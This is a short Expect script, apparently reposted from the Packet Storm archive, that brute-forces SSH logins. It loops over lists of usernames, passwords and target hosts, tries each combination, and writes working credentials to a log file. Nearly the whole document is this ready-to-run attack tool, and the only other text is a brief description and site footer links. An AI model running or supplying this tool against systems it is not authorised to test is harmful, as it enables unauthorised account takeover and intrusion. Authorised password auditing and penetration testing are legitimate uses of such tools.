Simple SSH brute forcing utility. Written in Expect.
03d481b8ffdc43333a1f7120ddebc8d3d17c19965174121aa69dd29b71ad2890#!/usr/bin/expect -f
# sshbfr.exp
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# SSH Brute Forcer
set usrfile [lindex $argv 0]
set pwdfile [lindex $argv 1]
set trgfile [lindex $argv 2]
set timeout [lindex $argv 3]
set logfile [lindex $argv 4]
if {[llength $argv] != 5} {
puts stdout "SSH Brute Forcer"
puts stdout "Usage: $argv0 <user.list> <pass.list> <target.list> <timeout> <log.file>"
exit }
set sshlog [open $logfile a]
set bruteusr [open $usrfile r]
set usernames [read $bruteusr ]
set brutepwd [open $pwdfile r]
set passwords [read $brutepwd ]
set brutetrg [open $trgfile r]
set targets [read $brutetrg ]
foreach usr $usernames {
foreach pwd $passwords {
foreach trg $targets {
spawn ssh $usr@$trg
expect "$trg" {
send "$pwd\n"
}
expect "Last" {
puts $sshlog "$usr:$pwd -> $trg\n"
close $sshlog
}
set pid [exp_pid]
exec kill -9 $pid
}
}
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed